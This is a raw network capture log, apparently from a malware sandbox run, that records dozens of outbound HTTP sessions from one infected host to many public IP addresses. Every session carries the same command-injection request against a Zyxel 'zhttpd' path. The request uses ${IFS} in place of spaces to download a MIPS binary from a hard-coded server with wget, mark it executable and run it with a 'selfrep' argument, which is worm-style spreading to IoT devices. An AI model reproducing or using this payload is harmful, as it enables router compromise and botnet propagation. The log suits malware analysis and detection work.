                                          Jan 14, 2024 15:46:02.732721090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1124192.168.2.2356512150.39.207.190443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.732724905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1125192.168.2.233469018.186.82.181443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.732724905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1126192.168.2.2346754163.207.231.243443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.732734919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1127192.168.2.2340886194.209.69.1443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.732789040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1128192.168.2.233281042.212.26.126443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.732820988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1129192.168.2.2335978102.196.173.176443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.732851982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1130192.168.2.234478458.79.103.25443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.732853889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1131192.168.2.2353024166.62.124.163443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.732883930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1132192.168.2.2352790132.255.108.59443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.732911110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1133192.168.2.2352984170.58.243.121443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.732927084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1134192.168.2.2345150110.130.200.214443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.732965946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1135192.168.2.23548764.130.216.227443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.733032942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1136192.168.2.2346950155.45.32.111443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.733043909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1137192.168.2.2345264121.175.176.140443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.733061075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1138192.168.2.23565781.76.29.15443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.733089924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1139192.168.2.2345208178.75.130.230443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.733093023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1140192.168.2.2350580120.233.190.191443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.733144045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1141192.168.2.235138477.131.103.60443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.733160973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1142192.168.2.233777495.53.166.93443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.733208895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1143192.168.2.235656223.92.146.13443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.733248949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1144192.168.2.2354054166.76.112.67443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.733251095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1145192.168.2.234371612.93.224.230443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.733299017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1146192.168.2.23351502.78.25.89443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.733330965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1147192.168.2.2351146128.152.194.35443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.733340025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1148192.168.2.2334272180.145.29.255443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.733347893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1149192.168.2.2349036142.118.87.122443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.733375072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1150192.168.2.2335042121.10.70.27443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.733441114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1151192.168.2.2333486130.118.135.124443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.733457088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1152192.168.2.2355902222.13.126.217443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.733480930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1153192.168.2.2357970104.175.131.34443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.733509064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1154192.168.2.2337624194.171.94.123443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.733520031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1155192.168.2.236023244.76.80.246443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.733561993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1156192.168.2.233580676.146.42.40443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.733575106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1157192.168.2.234732489.190.208.58443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.733607054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1158192.168.2.2354514166.205.218.69443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.733654976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1159192.168.2.233729449.233.95.240443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.733681917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1160192.168.2.2355864119.27.135.132443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.733683109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1161192.168.2.233958443.232.211.13443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.733719110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1162192.168.2.235889420.48.156.83443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.733719110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1163192.168.2.2333702142.157.27.2443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.733787060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1164192.168.2.2335336165.15.81.63443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.733825922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1165192.168.2.235565643.128.138.201443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.733848095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1166192.168.2.234502420.167.245.31443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.733863115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1167192.168.2.2341610102.149.43.118443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.733880997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1168192.168.2.2339344152.138.245.132443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.733897924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1169192.168.2.235417253.222.96.46443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.733939886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1170192.168.2.2345500175.221.65.3443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.733962059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1171192.168.2.235815098.222.0.211443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.733977079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1172192.168.2.2359968173.251.184.223443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.733987093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1173192.168.2.2338702183.145.208.248443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.733995914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1174192.168.2.2334856148.28.221.19443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.734052896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1175192.168.2.2354384159.52.226.166443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.734066010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1176192.168.2.2347028120.76.77.252443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.734083891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1177192.168.2.234745637.116.101.44443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.734124899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1178192.168.2.2335498211.103.116.235443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.734167099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1179192.168.2.23546109.25.161.84443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.734184980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1180192.168.2.235990036.189.232.241443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.734188080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1181192.168.2.2345450217.134.100.75443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.734220028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1182192.168.2.234563835.108.212.7443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.734270096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1183192.168.2.234357277.11.148.228443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.734302998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1184192.168.2.2359814118.241.158.190443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.734322071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1185192.168.2.2333464221.73.239.2443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.734338045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1186192.168.2.2343244103.179.191.33443
                                          TimestampBytes transferredDirectionData
